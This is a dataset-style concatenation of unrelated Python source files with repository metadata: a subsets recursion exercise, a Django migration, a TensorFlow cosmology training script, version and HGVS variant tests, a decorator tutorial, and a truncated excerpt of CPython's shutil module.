3b7113ec2fe7f30d44c4a0e4f1c9e0a04ee4f474 | 360e1f69f4c0923c5d79bc82aa33c0fd4e80b71e | /RECURSION/subsets.py | f334469a9f4ddc3cb74e3afb1d219f81e37a0ac4 | [] | no_license | Vijay1234-coder/data_structure_plmsolving | 04e52fe6c918313e13d39107a2ded8b47645bb12 | d449b266295d1ae55613cdcfd9b22ad9cee3dfbe | refs/heads/master | 2023-08-01T00:55:28.825972 | 2021-09-12T15:20:12 | 2021-09-12T15:20:12 | 387,782,783 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | def subSets(arr,index,sub):
if index==len(arr):
if len(sub)!=0:
print(sub)
else:
subSets(arr,index+1,sub)
subSets(arr,index+1,sub+[arr[index]])
return sub
arr = [1,2,3]
n = len(arr)
subSets(arr,0,[]) | [
"[email protected]"
] | |
016c0b20397a06625c09871ea2375ffd3f6a0c97 | dfe2a52a1c36a28a8bf85af7efd42380d980b773 | /virtual/lib/python3.6/site-packages/registration/migrations/0001_initial.py | 5c56041a6ca8b00eff3ae7668f2cfc0281c5d363 | [
"MIT"
] | permissive | virginiah894/Instagram-clone | 2c2a15d89fcdb25b22bd60428cf84a01f3bd553c | 4d8abe7bafefae06a0e462e6a47631c2f8a1d361 | refs/heads/master | 2022-12-10T06:56:21.105357 | 2020-01-07T14:14:50 | 2020-01-07T14:14:50 | 229,394,540 | 3 | 0 | MIT | 2022-12-08T03:23:40 | 2019-12-21T07:41:19 | Python | UTF-8 | Python | false | false | 1,159 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='RegistrationProfile',
fields=[
('id',
models.AutoField(
primary_key=True,
serialize=False,
auto_created=True,
verbose_name='ID')),
('activation_key',
models.CharField(
verbose_name='activation key',
max_length=40)),
('user',
models.OneToOneField(
to=settings.AUTH_USER_MODEL,
verbose_name='user',
on_delete=models.CASCADE)),
],
options={
'verbose_name': 'registration profile',
'verbose_name_plural': 'registration profiles',
},
),
]
| [
"[email protected]"
] | |
acfa5f0d183bd41ee79f4a9b874cb03788f3ca7c | 5d605697cd6bb493250718232d9e95c69f624103 | /code/train-est-mod-var/halo_unet.py | 7a248e48f709272bc78904f415e5b29854edcbf6 | [
"MIT"
] | permissive | modichirag/galmodel | 738a257e3fad89efd0f5698077c0c0ae67a99145 | d3243b8f2f51d558255346a37f2bda2f83274e3d | refs/heads/master | 2020-04-05T14:19:51.838549 | 2019-09-25T05:08:49 | 2019-09-25T05:08:49 | 156,924,087 | 4 | 1 | MIT | 2019-09-25T05:08:53 | 2018-11-09T22:17:24 | Jupyter Notebook | UTF-8 | Python | false | false | 12,405 | py | import numpy as np
import matplotlib.pyplot as plt
#
import sys, os
sys.path.append('../utils/')
import tools
import datatools as dtools
from time import time
os.environ["CUDA_VISIBLE_DEVICES"]="0"
#
import tensorflow as tf
from tensorflow.contrib.slim import add_arg_scope
from layers import wide_resnet
import tensorflow_hub as hub
import models
import logging
from datetime import datetime
#############################
seed_in = 3
from numpy.random import seed
seed(seed_in)
from tensorflow import set_random_seed
set_random_seed(seed_in)
bs = 400
nc, ncf = 128, 512
step, stepf = 5, 40
path = '../../data/z00/'
ftype = 'L%04d_N%04d_S%04d_%02dstep/'
ftypefpm = 'L%04d_N%04d_S%04d_%02dstep_fpm/'
numd = 1e-3
num = int(numd*bs**3)
R1 = 3
R2 = 3*1.2
kny = np.pi*nc/bs
kk = tools.fftk((nc, nc, nc), bs)
#seeds = [100]
seeds = [100, 200, 300, 400]
vseeds = [800, 900]
#############################
pad = int(0)
nsub = 2
fsize = 8
suff = 'pad0-unet-nsub2'
#fname = open('../models/n10/README', 'a+', 1)
#fname.write('%s \t :\n\tModel to predict halo position likelihood in halo_logistic with data supplemented by size=8, 16, 32, 64, 128; rotation with probability=0.5 and padding the mesh with 2 cells. Also reduce learning rate in piecewise constant manner. n_y=1 and high of quntized distribution to 3. Init field as 1 feature & high learning rate\n'%suff)
#fname.close()
savepath = '../modelsv2/n10/%s/'%suff
try : os.makedirs(savepath)
except: pass
fname = open(savepath + 'log', 'w+', 1)
#fname = None
num_cubes = 500
cube_sizes = np.array([16, 32, 64, 128]).astype(int)
nsizes = len(cube_sizes)
cube_sizesft = (cube_sizes + 2*pad).astype(int)
max_offset = nc - cube_sizes
ftname = ['cic']
tgname = ['pnn']
nchannels = len(ftname)
ntargets = len(tgname)
batch_size=64
rprob = 0.5
print('Features are ', ftname, file=fname)
print('Pad with ', pad, file=fname)
print('Rotation probability = %0.2f'%rprob, file=fname)
fname.close()
#############################
##Read data and generate meshes
def get_meshes(seed, galaxies=False):
mesh = {}
mesh['s'] = tools.readbigfile(path + ftypefpm%(bs, nc, seed, step) + 'mesh/s/')
partp = tools.readbigfile(path + ftypefpm%(bs, nc, seed, step) + 'dynamic/1/Position/')
mesh['cic'] = tools.paintcic(partp, bs, nc)
mesh['decic'] = tools.decic(mesh['cic'], kk, kny)
mesh['R1'] = tools.fingauss(mesh['cic'], kk, R1, kny)
mesh['R2'] = tools.fingauss(mesh['cic'], kk, R2, kny)
mesh['GD'] = mesh['R1'] - mesh['R2']
hmesh = {}
hposall = tools.readbigfile(path + ftype%(bs, ncf, seed, stepf) + 'FOF/PeakPosition/')[1:]
massall = tools.readbigfile(path + ftype%(bs, ncf, seed, stepf) + 'FOF/Mass/')[1:].reshape(-1)*1e10
hposd = hposall[:num].copy()
massd = massall[:num].copy()
hmesh['pcic'] = tools.paintcic(hposd, bs, nc)
hmesh['pnn'] = tools.paintnn(hposd, bs, nc)
hmesh['pnnsm'] = tools.fingauss(hmesh['pnn'], kk, R1, kny)
hmesh['mnn'] = tools.paintnn(hposd, bs, nc, massd)
# mesh['hd'] = hmesh['pcic'].copy()
# mesh['hd'] /= mesh['hd'].mean()
# mesh['hd'] -= 1
#
return mesh, hmesh
def generate_training_data():
meshes = {}
cube_features, cube_target = [[] for i in range(len(cube_sizes))], [[] for i in range(len(cube_sizes))]
for seed in seeds:
mesh, hmesh = get_meshes(seed)
meshes[seed] = [mesh, hmesh]
print('All the mesh have been generated for seed = %d'%seed)
#Create training voxels
ftlist = [mesh[i].copy() for i in ftname]
ftlistpad = [np.pad(i, pad, 'wrap') for i in ftlist]
targetmesh = [hmesh[i].copy() for i in tgname]
for i, size in enumerate(cube_sizes):
print('For size = ', size)
if size==nc:
features = [np.stack(ftlistpad, axis=-1)]
target = [np.stack(targetmesh, axis=-1)]
else:
numcubes = int(num_cubes/size*4)
features, target = dtools.randomvoxels(ftlistpad, targetmesh, numcubes, max_offset[i],
size, cube_sizesft[i], seed=seed, rprob=0)
cube_features[i] = cube_features[i] + features
cube_target[i] = cube_target[i] + target
for i in range(cube_sizes.size):
cube_target[i] = np.stack(cube_target[i],axis=0)
cube_features[i] = np.stack(cube_features[i],axis=0)
print(cube_features[i].shape, cube_target[i].shape)
return meshes, cube_features, cube_target
#############################
class MDNEstimator(tf.estimator.Estimator):
"""An estimator for distribution estimation using Mixture Density Networks.
"""
def __init__(self,
n_y,
n_mixture,
optimizer=tf.train.AdamOptimizer,
dropout=None,
model_dir=None,
config=None):
"""Initializes a `MDNEstimator` instance.
"""
def _model_fn(features, labels, mode):
return models._mdn_unetmodel_fn(features, labels,
nchannels, n_y, n_mixture, dropout,
optimizer, mode, pad=pad, fsize=fsize, nsub=nsub, distribution='logistic')
super(self.__class__, self).__init__(model_fn=_model_fn,
model_dir=model_dir,
config=config)
def mapping_function(inds):
def extract_batch(inds):
isize = np.random.choice(len(cube_sizes), 1, replace=True)[0]
batch = int(batch_size*8/cube_sizes[isize])
if cube_sizes[isize]==nc : batch = 1
inds = inds[:batch]
trainingsize = cube_features[isize].shape[0]
inds[inds >= trainingsize] = (inds[inds >= trainingsize])%trainingsize
features = cube_features[isize][inds].astype('float32')
targets = cube_target[isize][inds].astype('float32')
for i in range(batch):
nrotations=0
while (np.random.random() < rprob) & (nrotations < 3):
nrot, ax0, ax1 = np.random.randint(0, 3), *np.random.permutation((0, 1, 2))[:2]
features[i] = np.rot90(features[i], nrot, (ax0, ax1))
targets[i] = np.rot90(targets[i], nrot, (ax0, ax1))
nrotations +=1
# # print(isize, i, nrotations, targets[i].shape)
# # print(inds)
return features, targets
ft, tg = tf.py_func(extract_batch, [inds],
[tf.float32, tf.float32])
return ft, tg
def training_input_fn():
"""Serving input fn for training data"""
dataset = tf.data.Dataset.range(len(np.array(cube_features)[0]))
dataset = dataset.repeat().shuffle(1000).batch(batch_size)
dataset = dataset.map(mapping_function)
dataset = dataset.prefetch(16)
return dataset
def testing_input_fn():
"""Serving input fn for testing data"""
dataset = tf.data.Dataset.range(len(cube_features))
dataset = dataset.batch(16)
dataset = dataset.map(mapping_function)
return dataset
#############################################################################
###save
def save_module(model, savepath, max_steps):
print('\nSave module\n')
features = tf.placeholder(tf.float32, shape=[None, None, None, None, nchannels], name='input')
labels = tf.placeholder(tf.float32, shape=[None, None, None, None, ntargets], name='labels')
exporter = hub.LatestModuleExporter("tf_hub", tf.estimator.export.build_raw_serving_input_receiver_fn({'features':features, 'labels':labels},
default_batch_size=None))
modpath = exporter.export(model, savepath + 'module', model.latest_checkpoint())
modpath = modpath.decode("utf-8")
check_module(modpath)
#####
def check_module(modpath):
print('\nTest module\n')
tf.reset_default_graph()
module = hub.Module(modpath + '/likelihood/')
xx = tf.placeholder(tf.float32, shape=[None, None, None, None, nchannels], name='input')
yy = tf.placeholder(tf.float32, shape=[None, None, None, None, ntargets], name='labels')
samples = module(dict(features=xx, labels=yy), as_dict=True)['sample']
loglik = module(dict(features=xx, labels=yy), as_dict=True)['loglikelihood']
preds = {}
with tf.Session() as sess:
sess.run(tf.initializers.global_variables())
for seed in vseeds:
xxm = np.stack([np.pad(vmeshes[seed][0][i], pad, 'wrap') for i in ftname], axis=-1)
#yym = np.stack([np.pad(vmeshes[seed][1]['pnncen'], pad, 'wrap'), np.pad(vmeshes[seed][1]['pnnsat'], pad, 'wrap')], axis=-1)
yym = np.stack([vmeshes[seed][1][i] for i in tgname], axis=-1)
print('xxm, yym shape = ', xxm.shape, yym.shape)
preds[seed] = sess.run(samples, feed_dict={xx:np.expand_dims(xxm, 0), yy:np.expand_dims(yym, 0)})
vmeshes[seed][0]['predict'] = np.squeeze(preds[seed])
##############################
##Power spectrum
shape = [nc,nc,nc]
kk = tools.fftk(shape, bs)
kmesh = sum(i**2 for i in kk)**0.5
fig, axar = plt.subplots(2, 2, figsize = (8, 8))
ax = axar[0]
for seed in vseeds:
for i, key in enumerate(['']):
predict, hpmeshd = vmeshes[seed][0]['predict%s'%key] , vmeshes[seed][1]['pnn%s'%key],
k, pkpred = tools.power(predict/predict.mean(), boxsize=bs, k=kmesh)
k, pkhd = tools.power(hpmeshd/hpmeshd.mean(), boxsize=bs, k=kmesh)
k, pkhx = tools.power(hpmeshd/hpmeshd.mean(), predict/predict.mean(), boxsize=bs, k=kmesh)
##
ax[0].semilogx(k[1:], pkpred[1:]/pkhd[1:], label=seed)
ax[1].semilogx(k[1:], pkhx[1:]/(pkpred[1:]*pkhd[1:])**0.5)
ax[0].set_title(key, fontsize=12)
for axis in ax.flatten():
axis.legend(fontsize=14)
axis.set_yticks(np.arange(0, 1.2, 0.1))
axis.grid(which='both')
axis.set_ylim(0.,1.1)
ax[0].set_ylabel('Transfer function', fontsize=14)
ax[1].set_ylabel('Cross correlation', fontsize=14)
#
ax = axar[1]
for i, key in enumerate([ '']):
predict, hpmeshd = vmeshes[seed][0]['predict%s'%key] , vmeshes[seed][1]['pnn%s'%key],
vmin, vmax = 0, (hpmeshd[:, :, :].sum(axis=0)).max()
im = ax[0].imshow(predict[:, :, :].sum(axis=0), vmin=vmin, vmax=vmax)
im = ax[1].imshow(hpmeshd[:, :, :].sum(axis=0), vmin=vmin, vmax=vmax)
ax[0].set_title(key, fontsize=15)
ax[0].set_title('Prediction', fontsize=15)
ax[1].set_title('Truth', fontsize=15)
plt.savefig(savepath + '/vpredict%d.png'%max_steps)
plt.show()
#
############################################################################
#############---------MAIN---------################
meshes, cube_features, cube_target = generate_training_data()
vmeshes = {}
for seed in vseeds: vmeshes[seed] = get_meshes(seed)
# get TF logger
log = logging.getLogger('tensorflow')
log.setLevel(logging.DEBUG)
# create formatter and add it to the handlers
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# create file handler which logs even debug messages
try: os.makedirs(savepath + '/logs/')
except: pass
logfile = datetime.now().strftime('logs/tflogfile_%H_%M_%d_%m_%Y.log')
fh = logging.FileHandler(savepath + logfile)
fh.setLevel(logging.DEBUG)
fh.setFormatter(formatter)
log.addHandler(fh)
for max_steps in [50, 100, 1000, 3000, 5000, 10000, 15000, 20000, 25000, 30000, 35000,
40000, 45000, 50000, 55000, 60000, 70000]:
#for max_steps in [100]+list(np.arange(5e3, 7.1e4, 5e3, dtype=int)):
print('For max_steps = ', max_steps)
tf.reset_default_graph()
run_config = tf.estimator.RunConfig(save_checkpoints_steps = 2000)
model = MDNEstimator(n_y=ntargets, n_mixture=8, dropout=0.95,
model_dir=savepath + 'model', config = run_config)
model.train(training_input_fn, max_steps=max_steps)
f = open(savepath + 'model/checkpoint')
lastpoint = int(f.readline().split('-')[-1][:-2])
f.close()
if lastpoint > max_steps:
print('Don"t save')
print(lastpoint)
else:
print("Have to save")
save_module(model, savepath, max_steps)
| [
"[email protected]"
] | |
e89bf19c8f53855bfc3e1277c31a3391c13eeba9 | 33621e000244ef274de9f4da3f1afc83a130414f | /tests/test_version.py | 231a11632b4ac9665f625fd51b51dbfbda2a92cb | [
"MIT"
] | permissive | pombredanne/i18nspector | 8901b7dd39b2a9e662edd0870906bbe683ba1960 | abf543ccad9034e6278af0ba1bb6a384193c799b | refs/heads/master | 2021-01-19T20:09:06.069438 | 2017-07-04T08:26:38 | 2017-07-04T08:26:38 | 83,740,280 | 0 | 0 | null | 2017-07-04T08:26:39 | 2017-03-03T00:50:28 | Python | UTF-8 | Python | false | false | 1,911 | py | # Copyright © 2012-2013 Jakub Wilk <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the “Software”), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
from nose.tools import (
assert_equal,
)
from lib.cli import __version__
here = os.path.dirname(__file__)
docdir = os.path.join(here, os.pardir, 'doc')
def test_changelog():
path = os.path.join(docdir, 'changelog')
with open(path, 'rt', encoding='UTF-8') as file:
line = file.readline()
changelog_version = line.split()[1].strip('()')
assert_equal(changelog_version, __version__)
def test_manpage():
path = os.path.join(docdir, 'i18nspector.txt')
manpage_version = None
with open(path, 'rt', encoding='UTF-8') as file:
for line in file:
if line.startswith(':version:'):
manpage_version = line.split()[-1]
break
assert_equal(manpage_version, __version__)
# vim:ts=4 sts=4 sw=4 et
| [
"[email protected]"
] | |
8e281a5b517d5197c5e02452a34be7e31c26bc61 | 5191423bc86a4e56845c737b4ce6853f3faef90e | /pytautulli/const.py | 705a83cdab7eff5546a0fac20c880319ed7c337e | [
"MIT"
] | permissive | ludeeus/pytautulli | 075d354d03a50dab0ffb7d9425bb4015c1ff443d | 0cf5b826c2033882b582287bbd0056d81a30065f | refs/heads/main | 2023-04-09T15:51:02.346720 | 2023-02-04T14:35:39 | 2023-02-04T14:35:39 | 141,796,012 | 2 | 5 | MIT | 2023-03-29T06:59:02 | 2018-07-21T08:46:33 | Python | UTF-8 | Python | false | false | 374 | py | """Pytautulli constants."""
from enum import Enum
from logging import Logger, getLogger
API_HEADERS = {"Content-Type": "application/json"}
LOGGER: Logger = getLogger(__package__)
ATTR_RESPONSE = "response"
ATTR_DATA = "data"
class HTTPMethod(Enum):
"""HTTPMethod Enum."""
GET = "GET"
POST = "POST"
PUT = "PUT"
DELETE = "DELETE"
PATCH = "PATCH"
| [
"[email protected]"
] | |
945cbd4408c837958ac33a2794a1fa4bf98b2e3e | 0a3c85ca1388a6e9935509a0488f4027f40986f8 | /tests/issues/test_477.py | db9dd56244047b7eaa042b6be812e4e239298667 | [
"Apache-2.0"
] | permissive | langitem/hgvs | cbf4c9f22f4e8bd0523a8948e63b3bc95599c7ff | 0dac443b9dc565c7fdca5a4b8de40b3fea7624f4 | refs/heads/master | 2020-04-18T00:37:30.157853 | 2019-02-25T19:24:59 | 2019-02-25T19:24:59 | 167,084,812 | 0 | 0 | Apache-2.0 | 2019-02-16T01:57:14 | 2019-01-22T23:42:34 | Python | UTF-8 | Python | false | false | 3,213 | py | import pytest
from hgvs.exceptions import HGVSInvalidIntervalError
tests = (
# {"c": "", "g": "", "rs": "" },
# GPHB5, GRCh37 https://www.ncbi.nlm.nih.gov/gene/122876
{"c": "NM_145171.3:c.-63A>G", "g": "NC_000014.8:g.63785599T>C", "rs": "GPHB5/GRCh37/rs1299953722", "ex": HGVSInvalidIntervalError },
{"c": "NM_145171.3:c.-56G>A", "g": "NC_000014.8:g.63785592C>T", "rs": "GPHB5/GRCh37/rs982881702" },
{"c": "NM_145171.3:c.2T>C", "g": "NC_000014.8:g.63784562A>G", "rs": "GPHB5/GRCh37/rs1221379530" },
{"c": "NM_145171.3:c.388A>G", "g": "NC_000014.8:g.63779647T>C", "rs": "GPHB5/GRCh37/rs1380832691" },
{"c": "NM_145171.3:c.*4C>T", "g": "NC_000014.8:g.63779638G>A", "rs": "GPHB5/GRCh37/rs753041439" },
{"c": "NM_145171.3:c.*84A>G", "g": "NC_000014.8:g.63779558T>C", "rs": "GPHB5/GRCh37/rs1204774077" },
{"c": "NM_145171.3:c.*99G>A", "g": "NC_000014.8:g.63779543C>T", "rs": "GPHB5/GRCh37/rs144659601", "ex": HGVSInvalidIntervalError },
# GPHB5, GRCh37 https://www.ncbi.nlm.nih.gov/gene/122876
{"c": "NM_145171.3:c.-63A>G", "g": "NC_000014.9:g.63318885T>C", "rs": "GPHB5/GRCh38/rs1299953722", "ex": HGVSInvalidIntervalError },
{"c": "NM_145171.3:c.-56G>A", "g": "NC_000014.9:g.63318878C>T", "rs": "GPHB5/GRCh38/rs982881702" },
{"c": "NM_145171.3:c.2T>C", "g": "NC_000014.9:g.63317848A>G", "rs": "GPHB5/GRCh38/rs1221379530" },
{"c": "NM_145171.3:c.388A>G", "g": "NC_000014.9:g.63312933T>C", "rs": "GPHB5/GRCh38/rs1380832691" },
{"c": "NM_145171.3:c.*4C>T", "g": "NC_000014.9:g.63312924G>A", "rs": "GPHB5/GRCh38/rs753041439" },
{"c": "NM_145171.3:c.*84A>G", "g": "NC_000014.9:g.63312844T>C", "rs": "GPHB5/GRCh38/rs1204774077" },
{"c": "NM_145171.3:c.*99G>A", "g": "NC_000014.9:g.63312829C>T", "rs": "GPHB5/GRCh38/rs144659601", "ex": HGVSInvalidIntervalError },
# COX6A2 https://www.ncbi.nlm.nih.gov/gene/1339
{"c": "NM_005205.3:c.-106G>A", "g": "NC_000016.10:g.31428431C>T", "rs": "COX6A2/GRCh38/rs1033792906", "ex": HGVSInvalidIntervalError },
{"c": "NM_005205.3:c.-96C>T", "g": "NC_000016.10:g.31428421G>A", "rs": "COX6A2/GRCh38/rs755670336" },
{"c": "NM_005205.3:c.2T>C", "g": "NC_000016.10:g.31428324A>G", "rs": "COX6A2/GRCh38/rs200780049" },
{"c": "NM_005205.3:c.293G>A", "g": "NC_000016.10:g.31427775C>T", "rs": "COX6A2/GRCh38/rs764753905" },
{"c": "NM_005205.3:c.*3C>T", "g": "NC_000016.10:g.31427771G>A", "rs": "COX6A2/GRCh38/rs909673485" },
{"c": "NM_005205.3:c.*42G>C", "g": "NC_000016.10:g.31427732C>G", "rs": "COX6A2/GRCh38/rs375688325" },
{"c": "NM_005205.3:c.*43A>G", "g": "NC_000016.10:g.31427731T>C", "rs": "COX6A2/GRCh38/rs961248971" },
{"c": "NM_005205.3:c.*44G>A", "g": "NC_000016.10:g.31427730C>T", "rs": "COX6A2/GRCh38/rs756406653", "ex": HGVSInvalidIntervalError },
)
@pytest.mark.parametrize("pair", tests, ids=[p["rs"] for p in tests])
def test_pair(parser, am38, pair):
var_c = parser.parse(pair["c"])
var_g = parser.parse(pair["g"])
if "ex" in pair:
with pytest.raises(pair["ex"]):
var_gtoc = am38.g_to_c(var_g, var_c.ac)
else:
var_gtoc = am38.g_to_c(var_g, var_c.ac)
assert pair["c"] == str(var_gtoc)
| [
"[email protected]"
] | |
3588bec4261cc0eb788f5aa02ad1e5db0f2d19ec | db9b3be76bb5502d0b11a23ee829efbe328d68b2 | /python/decoretors/actual decorator/using_decorator.py | c32ca1660ad581167ad793785de47c1c3cd8ed78 | [] | no_license | NARESHSWAMI199/python | 2cdf240a8610815b4fb64fcb3e8beeafd3191aab | 4896345ea2af623c76b06083bcfb38d90f318c88 | refs/heads/master | 2020-12-01T16:47:49.974094 | 2019-12-29T04:32:03 | 2019-12-29T04:32:03 | 230,702,606 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 881 | py |
from functools import wraps
def decorator(func):
@wraps(func)
def warpper(*args, **kwargs): # this args take as a tuple
''' this is a warpper function'''
print("this is a awsome function ")
return func( *args,**kwargs)
# also use return here beacuse some function will return something
# work procces of decoreater
# func = decoretor(func) # here the decorder function call the wapperfunction and pass in your func name variale
# when you call func then you are calling wapper function
return warpper
@ decorator
def add(a,b):
'''this is add function'''
return a+b
print(add(2,3))
# if you check the name of your add function and print your functions doc string then you get the
# name is wrapper function and the doc also will wrapper function for solve this problem we imort wraps
print(add.__doc__)
print(add.__name__) | [
"[email protected]"
] | |
b7327ec48991201cec6ef1c2fe84990ae5ce6d4e | 709b56d4b045d9dc671a922bf95e4477def3aa51 | /Python-3.8.7/Lib/shutil.py | 6986bce8aaee2d30a7a4a8b1b397f4ac15a8738e | [
"MIT",
"GPL-1.0-or-later",
"Python-2.0",
"LicenseRef-scancode-python-cwi",
"LicenseRef-scancode-other-copyleft",
"BSD-3-Clause",
"0BSD",
"LicenseRef-scancode-free-unknown"
] | permissive | Gizmotronn/django-start | 1240ba3e3050f618364654e53a0f69f65c5c1f52 | f2046e04655d9040f4a55f3c771f87e323e33313 | refs/heads/master | 2023-03-19T12:23:19.980979 | 2021-01-28T22:08:30 | 2021-01-28T22:08:30 | 274,297,608 | 4 | 2 | MIT | 2021-03-20T05:50:25 | 2020-06-23T03:16:15 | Python | UTF-8 | Python | false | false | 50,924 | py | """Utility functions for copying and archiving files and directory trees.
XXX The functions here don't copy the resource fork or other metadata on Mac.
"""
import os
import sys
import stat
import fnmatch
import collections
import errno
try:
import zlib
del zlib
_ZLIB_SUPPORTED = True
except ImportError:
_ZLIB_SUPPORTED = False
try:
import bz2
del bz2
_BZ2_SUPPORTED = True
except ImportError:
_BZ2_SUPPORTED = False
try:
import lzma
del lzma
_LZMA_SUPPORTED = True
except ImportError:
_LZMA_SUPPORTED = False
try:
from pwd import getpwnam
except ImportError:
getpwnam = None
try:
from grp import getgrnam
except ImportError:
getgrnam = None
_WINDOWS = os.name == 'nt'
posix = nt = None
if os.name == 'posix':
import posix
elif _WINDOWS:
import nt
COPY_BUFSIZE = 1024 * 1024 if _WINDOWS else 64 * 1024
_USE_CP_SENDFILE = hasattr(os, "sendfile") and sys.platform.startswith("linux")
_HAS_FCOPYFILE = posix and hasattr(posix, "_fcopyfile") # macOS
# CMD defaults in Windows 10
_WIN_DEFAULT_PATHEXT = ".COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC"
__all__ = ["copyfileobj", "copyfile", "copymode", "copystat", "copy", "copy2",
"copytree", "move", "rmtree", "Error", "SpecialFileError",
"ExecError", "make_archive", "get_archive_formats",
"register_archive_format", "unregister_archive_format",
"get_unpack_formats", "register_unpack_format",
"unregister_unpack_format", "unpack_archive",
"ignore_patterns", "chown", "which", "get_terminal_size",
"SameFileError"]
# disk_usage is added later, if available on the platform
class Error(OSError):
pass
class SameFileError(Error):
"""Raised when source and destination are the same file."""
class SpecialFileError(OSError):
"""Raised when trying to do a kind of operation (e.g. copying) which is
not supported on a special file (e.g. a named pipe)"""
class ExecError(OSError):
"""Raised when a command could not be executed"""
class ReadError(OSError):
"""Raised when an archive cannot be read"""
class RegistryError(Exception):
"""Raised when a registry operation with the archiving
and unpacking registries fails"""
class _GiveupOnFastCopy(Exception):
"""Raised as a signal to fallback on using raw read()/write()
file copy when fast-copy functions fail to do so.
"""
def _fastcopy_fcopyfile(fsrc, fdst, flags):
"""Copy a regular file content or metadata by using high-performance
fcopyfile(3) syscall (macOS).
"""
try:
infd = fsrc.fileno()
outfd = fdst.fileno()
except Exception as err:
raise _GiveupOnFastCopy(err) # not a regular file
try:
posix._fcopyfile(infd, outfd, flags)
except OSError as err:
err.filename = fsrc.name
err.filename2 = fdst.name
if err.errno in {errno.EINVAL, errno.ENOTSUP}:
raise _GiveupOnFastCopy(err)
else:
raise err from None
def _fastcopy_sendfile(fsrc, fdst):
"""Copy data from one regular mmap-like fd to another by using
high-performance sendfile(2) syscall.
This should work on Linux >= 2.6.33 only.
"""
# Note: copyfileobj() is left alone in order to not introduce any
# unexpected breakage. Possible risks by using zero-copy calls
# in copyfileobj() are:
# - fdst cannot be open in "a"(ppend) mode
# - fsrc and fdst may be open in "t"(ext) mode
# - fsrc may be a BufferedReader (which hides unread data in a buffer),
# GzipFile (which decompresses data), HTTPResponse (which decodes
# chunks).
# - possibly others (e.g. encrypted fs/partition?)
global _USE_CP_SENDFILE
try:
infd = fsrc.fileno()
outfd = fdst.fileno()
except Exception as err:
raise _GiveupOnFastCopy(err) # not a regular file
# Hopefully the whole file will be copied in a single call.
# sendfile() is called in a loop 'till EOF is reached (0 return)
# so a bufsize smaller or bigger than the actual file size
# should not make any difference, also in case the file content
# changes while being copied.
try:
blocksize = max(os.fstat(infd).st_size, 2 ** 23) # min 8MiB
except OSError:
blocksize = 2 ** 27 # 128MiB
# On 32-bit architectures truncate to 1GiB to avoid OverflowError,
# see bpo-38319.
if sys.maxsize < 2 ** 32:
blocksize = min(blocksize, 2 ** 30)
offset = 0
while True:
try:
sent = os.sendfile(outfd, infd, offset, blocksize)
except OSError as err:
# ...in oder to have a more informative exception.
err.filename = fsrc.name
err.filename2 = fdst.name
if err.errno == errno.ENOTSOCK:
# sendfile() on this platform (probably Linux < 2.6.33)
# does not support copies between regular files (only
# sockets).
_USE_CP_SENDFILE = False
raise _GiveupOnFastCopy(err)
if err.errno == errno.ENOSPC: # filesystem is full
raise err from None
# Give up on first call and if no data was copied.
if offset == 0 and os.lseek(outfd, 0, os.SEEK_CUR) == 0:
raise _GiveupOnFastCopy(err)
raise err
else:
if sent == 0:
break # EOF
offset += sent
def _copyfileobj_readinto(fsrc, fdst, length=COPY_BUFSIZE):
"""readinto()/memoryview() based variant of copyfileobj().
*fsrc* must support readinto() method and both files must be
open in binary mode.
"""
# Localize variable access to minimize overhead.
fsrc_readinto = fsrc.readinto
fdst_write = fdst.write
with memoryview(bytearray(length)) as mv:
while True:
n = fsrc_readinto(mv)
if not n:
break
elif n < length:
with mv[:n] as smv:
fdst.write(smv)
else:
fdst_write(mv)
def copyfileobj(fsrc, fdst, length=0):
"""copy data from file-like object fsrc to file-like object fdst"""
# Localize variable access to minimize overhead.
if not length:
length = COPY_BUFSIZE
fsrc_read = fsrc.read
fdst_write = fdst.write
while True:
buf = fsrc_read(length)
if not buf:
break
fdst_write(buf)
def _samefile(src, dst):
# Macintosh, Unix.
if isinstance(src, os.DirEntry) and hasattr(os.path, 'samestat'):
try:
return os.path.samestat(src.stat(), os.stat(dst))
except OSError:
return False
if hasattr(os.path, 'samefile'):
try:
return os.path.samefile(src, dst)
except OSError:
return False
# All other platforms: check for same pathname.
return (os.path.normcase(os.path.abspath(src)) ==
os.path.normcase(os.path.abspath(dst)))
def _stat(fn):
return fn.stat() if isinstance(fn, os.DirEntry) else os.stat(fn)
def _islink(fn):
return fn.is_symlink() if isinstance(fn, os.DirEntry) else os.path.islink(fn)
def copyfile(src, dst, *, follow_symlinks=True):
"""Copy data from src to dst in the most efficient way possible.
If follow_symlinks is not set and src is a symbolic link, a new
symlink will be created instead of copying the file it points to.
"""
sys.audit("shutil.copyfile", src, dst)
if _samefile(src, dst):
raise SameFileError("{!r} and {!r} are the same file".format(src, dst))
file_size = 0
for i, fn in enumerate([src, dst]):
try:
st = _stat(fn)
except OSError:
# File most likely does not exist
pass
else:
# XXX What about other special files? (sockets, devices...)
if stat.S_ISFIFO(st.st_mode):
fn = fn.path if isinstance(fn, os.DirEntry) else fn
raise SpecialFileError("`%s` is a named pipe" % fn)
if _WINDOWS and i == 0:
file_size = st.st_size
if not follow_symlinks and _islink(src):
os.symlink(os.readlink(src), dst)
else:
with open(src, 'rb') as fsrc, open(dst, 'wb') as fdst:
# macOS
if _HAS_FCOPYFILE:
try:
